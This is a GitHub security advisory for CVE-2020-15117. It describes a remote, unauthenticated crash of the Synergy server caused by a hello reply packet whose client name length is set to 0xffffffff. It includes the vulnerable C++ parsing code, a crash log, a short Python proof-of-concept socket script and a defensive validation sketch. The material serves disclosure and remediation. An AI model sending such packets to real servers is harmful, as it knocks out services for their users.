
Denial of Service / Crash of synergys

Moderate
Jnewbon published GHSA-chfm-333q-gfpp Jul 14, 2020

Package

synergys

Affected versions

<1.12.0

Patched versions

None

Description

Advisory

Zendesk Ticket: 132450
Vendor: Symless
Software: Synergy
Software URL: https://github.com/symless/synergy-core https://symless.com/synergy
Version Reviewed: 1.12.0, protocol version 1.6
Bug Type: Denial of Service / Crash
Vector: Remote, unauthenticated
Impact: Denial of Service
Discovery Date: 20200706
Discovered By: Sven Blumenstein of Apple Information Security
CVSS: 6.5
Summary:

A Synergy server can be crashed by sending a kMsgHelloBack packet with a client name length set to
0xffffffff (4294967295) if the server's memory is less than 4 GB.

Technical Details:

If a client sends a kMsgHelloBack packet, the size of the client name is sent as 4 bytes, which are parsed as follows:

UInt32 len = (static_cast<UInt32>(buffer[0]) << 24) |
             (static_cast<UInt32>(buffer[1]) << 16) |
             (static_cast<UInt32>(buffer[2]) <<  8) |
              static_cast<UInt32>(buffer[3]);

Next a buffer is allocated based on that value:

UInt8* sBuffer = buffer;
if (!useFixed) {
    sBuffer = new UInt8[len];
}

The allocation fails if the requested buffer size is larger than the available system memory, and the resulting exception is caught by the following code:

} catch (std::bad_alloc &ba) {
    delete server;
    throw ba;
}

Log file output of a crash based on this issue:

synergys -f -d DEBUG2 --config synergy.conf

[...]
[2020-07-06T15:14:45] NOTE: accepted client connection
[2020-07-06T15:14:45] DEBUG1: registered event type inputReady as 37
[2020-07-06T15:14:45] DEBUG1: registered event type outputError as 38
[2020-07-06T15:14:45] DEBUG1: registered event type inputShutdown as 39
[2020-07-06T15:14:45] DEBUG1: registered event type outputShutdown as 40
[2020-07-06T15:14:45] DEBUG1: saying hello
[2020-07-06T15:14:45] DEBUG2: writef(Synergy%2i%2i)
[2020-07-06T15:14:45] DEBUG1: registered event type outputFlushed as 41
[2020-07-06T15:14:45] DEBUG2: wrote 11 bytes
[2020-07-06T15:14:45] DEBUG1: registered event type success as 42
[2020-07-06T15:14:45] DEBUG1: registered event type failure as 43
[2020-07-06T15:14:45] DEBUG1: parsing hello reply
[2020-07-06T15:14:45] DEBUG2: readf(Synergy%2i%2i%s)
[2020-07-06T15:14:45] DEBUG2: readf: read 2 byte integer: 1 (0x1)
[2020-07-06T15:14:45] DEBUG2: readf: read 2 byte integer: 6 (0x6)
[2020-07-06T15:14:45] DEBUG1: caught cancel on thread 0x00000002
[2020-07-06T15:14:45] FATAL: An error occurred: std::bad_alloc

Synergy config file and proof of concept:

synergy.conf:

section: screens
  synclient:
  syntest:
end
section: links
  synclient:
    right = syntest 
  syntest:
    left = synclient 
end

Proof of concept:

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.13.37.207', 24800))
print s.recv(2048)
s.sendall('\x00\x00\x00\x10Synergy\x00\x01\x00\x06\xff\xff\xff\xffA')

It was verified that this issue does not cause a crash through the exception handler if the
available memory of the server is more than 4 GB.

Recommendations:

  • Limit the maximum value of a string parameter to a more reasonable amount for the kMsgHelloBack packet.
  • Check string allocation size against available memory and catch an exception without terminating the server.
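
One way to apply the first recommendation, shown as an added example that is not Synergy's code or the project's patch: a stand-alone parser for the hello reply payload that validates the 4-byte name length before it reaches any allocation. The 256-byte cap `kMaxNameLen`, the `HelloBack` struct and the function names are assumptions made for this sketch.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <string>

// Assumed cap for a client (screen) name; not a value taken from Synergy.
constexpr std::uint32_t kMaxNameLen = 256;

struct HelloBack { std::uint16_t verMajor; std::uint16_t verMinor; std::string name; };

// Read an n-byte big-endian unsigned integer.
static std::uint32_t readBE(const std::uint8_t* p, int n) {
    std::uint32_t v = 0;
    for (int i = 0; i < n; ++i) v = (v << 8) | p[i];
    return v;
}

// Payload after the 4-byte frame length, as in the packet shown above:
// "Synergy" | major(2) | minor(2) | nameLen(4) | name bytes.
// Returns false, without allocating, when the declared length is implausible.
bool parseHelloBack(const std::uint8_t* buf, std::size_t size, HelloBack& out) {
    static const char kMagic[] = "Synergy";
    const std::size_t magicLen = sizeof(kMagic) - 1;
    const std::size_t fixed = magicLen + 2 + 2 + 4;
    if (size < fixed || std::memcmp(buf, kMagic, magicLen) != 0) return false;

    const std::uint32_t len = readBE(buf + magicLen + 4, 4);
    // Check the length before it reaches any allocator: it must be within the
    // cap and no larger than the bytes actually received.
    if (len > kMaxNameLen || len > size - fixed) return false;

    out.verMajor = static_cast<std::uint16_t>(readBE(buf + magicLen, 2));
    out.verMinor = static_cast<std::uint16_t>(readBE(buf + magicLen + 2, 2));
    out.name.assign(reinterpret_cast<const char*>(buf + fixed), len);
    return true;
}

int main() {
    // Constructed inputs: a well-formed reply naming "syntest", and a reply
    // whose name length field is 0xffffffff as described in the advisory.
    const std::uint8_t good[] = {'S','y','n','e','r','g','y',0,1,0,6, 0,0,0,7,
                                 's','y','n','t','e','s','t'};
    const std::uint8_t huge[] = {'S','y','n','e','r','g','y',0,1,0,6,
                                 0xff,0xff,0xff,0xff, 'A'};
    HelloBack m;
    bool okGood = parseHelloBack(good, sizeof(good), m);
    bool okHuge = parseHelloBack(huge, sizeof(huge), m);
    return (okGood && !okHuge) ? 0 : 1;
}
```

Comparing the declared length against the bytes actually received, not only against a fixed cap, also rejects replies whose length field overstates a short payload.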

Severity

Moderate

CVE ID

CVE-2020-15117

Weaknesses

No CWEs